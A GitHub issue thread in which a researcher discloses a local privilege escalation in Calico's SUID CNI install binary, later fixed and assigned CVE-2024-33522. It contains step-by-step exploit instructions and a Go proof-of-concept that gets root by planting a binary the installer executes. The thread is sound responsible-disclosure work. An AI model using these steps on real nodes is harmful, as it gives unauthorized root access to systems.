### ISSUE TITLE
Potential Local Privilege Escalation In Calico Install Binary.

### ISSUE THREAD

**Issue by latortuga71** [projectcalico/calico#7981]
During a security assessment i found a potential local privilege escalation with the calico install binary in 
`cni-plugn/pkg/install/install.go` 
`cnii-plugin/cmd/calico.go`

The binary creates the `/host/opt/cni/bin` directories if they do not already exist. Also it sets itself to be ran as a suid binary. This can potentially be abused in the following scenario. The binaries have suid bit set to run as the root user but the /host directory does not exist on the system. The abuse stems from the fact that users can control whether files are copied via environment variables. And Control Whether a directory is created or not. Finally it executes a separate binary in a directory we potentially control.

The way to abuse this to privilege escalate to the root user is as follows.
1. as a normal user set the umask to 0000 then cd into the path
cd /opt/bin/cni
then run the install binary with the following environment variables set.
`TLS_ASSESTS_DIR=/ UPDATE_CNI_BINARIES=false ./install`

if the /host directory doesn't exist it will be created by root user
by setting our umask before running this we can now create the needed directory that we can place a malicious calico binary that will be executed. 

2. mkdir -p /host/opt/cni/bin
we can build an example payload shown below
```go
package main

import (
	"fmt"
	"os"
	"syscall"
)

func main(){
    uid := os.Getuid()
    guid := os.Getgid()
    euid, egid := os.Geteuid(), os.Getegid() 
    err := syscall.Setuid(euid);
      if err != nil {
        data := []byte(fmt.Sprintf("Your uid %d guid %d euid %d geuid %d ERRR %s",uid,guid,euid,egid,err.Error()))
        os.WriteFile("/tmp/notroot",data,0777)
      } else {
        data := []byte(fmt.Sprintf("Your uid %d guid %d euid %d geuid %d ERRR %s",uid,guid,euid,egid,"worked"))
        os.WriteFile("/root/exploited",data,0777)
      }
      os.Exit(-1)
  }
```
and copy it to the directory with the name calico
cp ./calico /host/opt/cni/bin

3. running the install binary again with the correct env variables 
TLS_ASSESTS_DIR=/ UPDATE_CNI_BINARIES=false ./install
will tell it to not override our malicious calico binary but it will still execute the following line 

```go
cmd := exec.Command(d+"/calico", "-v") 
```

 and run our payload to get code execution as root.

This is not a high severity issue by any means but i think it was worth mentioning since it did allow for privilege escalation. In that scenario where the /host folder doesn't exist but the binaries have been built and have the suid set to run as root.

## Possible Solution
Instead of executing that binary. Just check if the files exists in the directory perhaps?

## Your Environment
* Kubernetes Control Plane Node.
* Also tested on fedora

**Comment by mazdakn** [comment]
@Behnam-Shobiri @anthonytwh please take a look at this one.

**Comment by caseydavenport** [comment]
@latortuga71 I'm not entirely following - are you running the `install` binary from directly on a host system?

Generally that is meant to run from within a container, so the `/host/` directory is never actually created on the host system - it's a volume mount of those paths from the host.

I am not sure this is a privilege escalation if in order to run this you need to have access to create and run binaries in the /opt/cni/bin directory on the host already. Perhaps I am misunderstanding something?

**Comment by sridhartigera** [comment]
@latortuga71 Any update?

**Comment by Behnam-Shobiri** [comment]
@sridhartigera we are internally following this bug. Will update this issue once everything is finalized.

**Comment by coutinhop** [comment]
Fixed by https://github.com/projectcalico/calico/pull/8447 and https://github.com/projectcalico/calico/pull/8517

**Comment by Behnam-Shobiri** [comment]
Based on our investigation, we have created CVE-2024-33522 for this issue. 
In vulnerable versions of Calico (v3.27.2 and below), Calico Enterprise (v3.19.0-1, v3.18.1, v3.17.3 and below), and Calico Cloud (v19.2.0 and below), an attacker who has local access to the Kubernetes node, can escalate their privileges by exploiting a vulnerability in the Calico CNI install binary. The issue arises from an incorrect SUID (Set User ID) bit configuration in the binary, combined with the ability to control the input binary, allowing an attacker to execute an arbitrary binary with elevated privileges.
For more information please see the official statement https://www.tigera.io/security-bulletins-tta-2024-001/
Thank you again @latortuga71 for reporting this issue.

**Comment by zemliany** [comment]
hey, folks! any ETA, when Calico 3.26.5 milestone is expected to be released, where this fix was cherry-picked?

https://github.com/projectcalico/calico/pull/8537

**Comment by zemliany** [comment]
@Behnam-Shobiri thanks for the update! unfortunately, we cannot update straight-forward to 3.28 or to 3.27 versions due to incompatibility with the mentioned Calico version with the current Kubernetes version and Kubernetes version on what we're going to migrate as per system requirements from Calico docs

https://docs.tigera.io/calico/latest/getting-started/kubernetes/requirements
https://docs.tigera.io/calico/3.27/getting-started/kubernetes/requirements

but 3.26 currently fits with the Kubernetes version what we're going to migrate  

https://docs.tigera.io/calico/3.26/getting-started/kubernetes/requirements

That's why I've asked the question here
